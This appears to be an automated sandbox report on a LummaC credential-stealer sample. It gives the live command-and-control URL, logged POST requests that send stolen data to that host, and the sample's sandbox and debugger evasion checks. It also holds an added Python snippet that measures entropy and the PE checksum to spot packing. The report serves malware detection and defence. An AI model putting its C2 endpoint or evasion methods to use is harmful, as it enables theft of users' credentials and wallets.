
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562133
MD5: 5032eea68452ff054956add942d03697
SHA1: dc28bb50951074ec5d823e4bc94ba520796cc88f
SHA256: 940581abda4098f8858edda4080cff127a179db5c7ac9d6f357881569b703fdb
Tags: exe, user-Bitsight

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5032EEA68452FF054956ADD942D03697)
  • cleanup
{"C2 url": "https://frogs-severz.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: file.exe PID: 7660 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: file.exe PID: 7660 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 7660 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T08:44:18.805230+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49722 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:20.760278+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49728 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:23.017010+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49734 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:25.390045+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49740 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:28.079334+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49746 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:30.698245+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49756 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:33.207388+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49765 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:37.037756+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49776 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:19.488836+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49722 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:21.447383+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49728 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:19.488836+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49722 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:21.447383+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9 | 49728 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:31.413842+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49756 | 104.21.88.250 | 443 | TCP


          AV Detection

Source: file.exe | Avira: detected
Source: https://frogs-severz.sbs/apial | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/api= | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apiz | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/4R | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apisi | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs:443/api | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apig | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/api) | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/TR | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apii | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apiX | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apia | Avira URL Cloud: Label: malware
Source: file.exe.7660.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": "https://frogs-severz.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49765 version: TLS 1.2

          Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49728 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49728 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49756 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49722 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49722 -> 104.21.88.250:443
Source: Malware configuration extractor | URLs: https://frogs-severz.sbs/api
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49740 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49756 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49734 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49728 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49765 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49746 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49722 -> 104.21.88.250:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: frogs-severz.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: frogs-severz.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=A5K45MZSF13L | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12815 | Host: frogs-severz.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=P14SZ2J0R2C1792 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15051 | Host: frogs-severz.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=A8CHGFSQ06VHXG923T | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20585 | Host: frogs-severz.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=03GZDEUN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1162 | Host: frogs-severz.sbs
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=DH8RDUB2KBUN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 551295 | Host: frogs-severz.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic | DNS traffic detected: DNS query: frogs-severz.sbs
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: frogs-severz.sbs

          System Summary

Source: file.exe | Static PE information: section name: (unprintable)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (unprintable)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0106E8C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D9030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A98F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003AE0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A89A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E0C80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B9530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C3D70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E1580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003ACF05
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C8770
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C1790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C0870
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A4040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A6840
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DC040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005738E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DF8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059A11D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003AE970
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D99DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A61A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E9CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050B18F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D41D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003AB210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A9210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A4AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E935F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BDB30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040830B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055CB0C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BFB60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A2B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056639A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00506BA7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E041B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C8CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A5C90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D24E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A94D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A6CC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003AAD00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A3580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7E20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C0650
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00563ED1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00567ECA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C5E90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E0F60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FDFCA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D87B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042CFFF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DC780
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A77D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A27D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056CFA2
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: (unprintable name) ZLIB complexity 0.9992955942622951
Source: file.exe | Static PE information: Section: qozugtow ZLIB complexity 0.9945777757578077
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D27B0 CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1448813585.0000000005649000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448392633.0000000005664000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1471828980.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1472178462.00000000056E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: file.exe | Static file information: File size 1844224 > 1048576
Source: file.exe | Static PE information: Raw size of qozugtow is bigger than: 0x100000 < 0x198400

          Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qozugtow:EW;qlsbilts:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qozugtow:EW;qlsbilts:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c557e should be: 0x1c95c9
Source: file.exe | Static PE information: section name: (unprintable)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (unprintable)
Source: file.exe | Static PE information: section name: qozugtow
Source: file.exe | Static PE information: section name: qlsbilts
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0106E163 push FFFFFFDBh; iretd 0_3_0106E174
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0106E5E1 push esi; retf 0_3_0106E5E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108C350 push eax; ret 0_3_0108C351
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CB50 push eax; retf 0_3_0108CB51
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CF50 push eax; iretd 0_3_0108CF51
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108C354 push eax; ret 0_3_0108C355
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CB54 push eax; retf 0_3_0108CB55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CF54 push eax; iretd 0_3_0108CF55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108C368 push 680108C3h; ret 0_3_0108C36D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CB68 push 680108CBh; retf 0_3_0108CB6D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CF68 push 680108CFh; iretd 0_3_0108CF6D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108C360 pushad ; ret 0_3_0108C361
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CB60 pushad ; retf 0_3_0108CB61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CF60 pushad ; iretd 0_3_0108CF61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108C364 pushad ; ret 0_3_0108C365
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CB64 pushad ; retf 0_3_0108CB65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0108CF64 pushad ; iretd 0_3_0108CF65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059A058 push eax; mov dword ptr [esp], ebp 0_2_0059A0B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005ED851 push 7358FF57h; mov dword ptr [esp], ebp 0_2_005ED8B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B8028 push esp; ret 0_2_003B802B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DA06B push ecx; mov dword ptr [esp], esi 0_2_005DA0CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DA06B push 25A65661h; mov dword ptr [esp], eax 0_2_005DA10B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E901F push 510B6672h; mov dword ptr [esp], ebp 0_2_005E9047
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E901F push 7BCEEF41h; mov dword ptr [esp], edi 0_2_005E9070
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B5057 push eax; iretd 0_2_003B5058
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E78CA push ebx; mov dword ptr [esp], 3A8859BFh 0_2_005E791D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E78CA push eax; mov dword ptr [esp], esp 0_2_005E7961
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062E0F7 push edx; mov dword ptr [esp], ebx 0_2_0062E15A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005738E9 push 050445EDh; mov dword ptr [esp], edx 0_2_00573923
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005738E9 push ebx; mov dword ptr [esp], edx 0_2_00573995
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005738E9 push 5ADCF211h; mov dword ptr [esp], ebx 0_2_005739A5
Source: file.exe | Static PE information: section name: (unprintable) entropy: 7.98162486605094
Source: file.exe | Static PE information: section name: qozugtow entropy: 7.953498445966998
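The three static indicators in this section (an entry point inside a non-standard section, a header checksum that does not match the file, and sections whose content has an entropy of about 7.95 to 7.98 bits per byte) are the classic signature of a packed executable. The block below is an added example, not code from this report or from any analysis tool: it implements the two measurements behind those rows, Shannon entropy over a byte string and the PE header checksum (the same one's-complement sum over 32-bit words, skipping the CheckSum field and adding the file length, that imagehlp's CheckSumMappedFile and pefile's generate_checksum() compute), and a small section heuristic, run on constructed byte strings rather than on the sample.

```python
import math
import os
import struct


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: near 0 for padding, near 8 for compressed or encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_checksum(image: bytes, checksum_field_offset: int) -> int:
    """Recompute the OptionalHeader.CheckSum value for a PE image.

    Sum the file as little-endian 32-bit words, folding carries back in,
    skip the word holding the CheckSum field itself, fold to 16 bits and
    add the (unpadded) file length. A mismatch with the stored value means
    the file was modified after linking, which packers rarely bother to fix."""
    padded = image + b"\x00" * (-len(image) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_field_offset:        # assumed dword-aligned, as in a real header
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def section_flags(name: str, data: bytes, entropy_threshold: float = 7.0):
    """Packer heuristics matching the report rows: odd section name, near-random content."""
    flags = []
    if not name.startswith(".") or not name.isprintable():
        flags.append("unusual-name")
    if shannon_entropy(data) > entropy_threshold:
        flags.append("high-entropy")
    return flags


if __name__ == "__main__":
    blob = os.urandom(4096)                     # stands in for a packed section body
    print(round(shannon_entropy(blob), 3), section_flags("qozugtow", blob))
```

In a real triage script the image bytes come from the file on disk and `checksum_field_offset` is `e_lfanew + 0x58` for both PE32 and PE32+ (the CheckSum field sits at the same offset in both optional-header layouts); compare the result with the stored value to reproduce the "real checksum ... should be" row above.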

          Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 579237 second address: 57923B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57923B second address: 579246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5782F1 second address: 5782F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57857D second address: 578583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5786FD second address: 578701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
